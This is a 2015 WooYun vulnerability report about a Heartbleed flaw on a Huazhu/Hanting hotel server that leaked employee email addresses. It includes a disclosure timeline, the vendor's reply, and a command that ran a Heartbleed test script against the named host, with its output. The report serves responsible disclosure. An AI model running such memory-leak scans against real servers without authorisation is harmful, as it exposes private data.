
Vulnerability summary

Defect ID: wooyun-2015-090041

Title: Heartbleed on a Huazhu site leaks a large number of employee email addresses

Affected vendor: Hanting Hotels (汉庭酒店)

Author: 杀器王子

Submitted: 2015-01-05 12:42

Fixed: 2015-02-19 12:44

Published: 2015-02-19 12:44

Vulnerability type: system/service patches not applied in time

Severity: High

Self-assessed Rank: 15

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-01-05: details reported to the vendor, awaiting vendor action
2015-01-05: vendor confirmed; details disclosed to the vendor only
2015-01-15: details disclosed to core white hats and relevant domain experts
2015-01-25: details disclosed to regular white hats
2015-02-04: details disclosed to intern white hats
2015-02-19: details disclosed to the public

Brief description:

Drip, drip.

Detailed description:

lync.huazhu.com is vulnerable to Heartbleed (CVE-2014-0160). Running the Heartbleed test script against it:

python OpenSSL.py         
input IP:lync.huazhu.com
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!


Proof of vulnerability:

A large number of internal employee email addresses are leaked in the returned memory.

[Screenshot: huazhu.jpg]

Fix recommendation:

Apply the patch.

Copyright notice: when reproducing, please credit 杀器王子@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-05 16:04

Vendor reply:

Thanks for the report; this issue has been handed over to the relevant team for handling.

Latest status:

None yet